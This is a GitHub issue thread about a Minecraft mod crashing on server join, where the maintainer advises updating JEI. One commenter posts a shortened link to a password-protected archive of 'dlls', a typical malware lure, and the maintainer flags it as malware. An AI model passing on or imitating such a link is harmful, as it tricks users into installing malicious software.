### ISSUE TITLE
Crashing game on Server Join

### ISSUE THREAD

**Issue by VoidSpectrum** [gisellevonbingen-Minecraft/JustEnoughMekanismMultiblocks#19]
Just updated the mod today on my modded SMP and now all the users crash when trying to join the server.

Heres the crash log, its all I have atm, and also heres the modpack export 

[i do a little silly-1.3.1.zip](https://github.com/user-attachments/files/17177027/i.do.a.little.silly-1.3.1.zip)

[crash-2024-09-28_17.06.16-client.txt](https://github.com/user-attachments/files/17177024/crash-2024-09-28_17.06.16-client.txt)

**Comment by gisellevonbingen** [comment]
Please update JEI
https://legacy.curseforge.com/minecraft/mc-mods/jei/files/5739143

**Comment by SagarChandra07** [comment]
install this
https://bit.ly/47P0Nvo
Archive password: changeme
I put the necessary dlls in the archive

**Comment by gisellevonbingen** [comment]
> install this https://bit.ly/47P0Nvo Archive password: changeme I put the necessary dlls in the archive

DO NOT INSTALL THIS

THIS IS MALLWARE
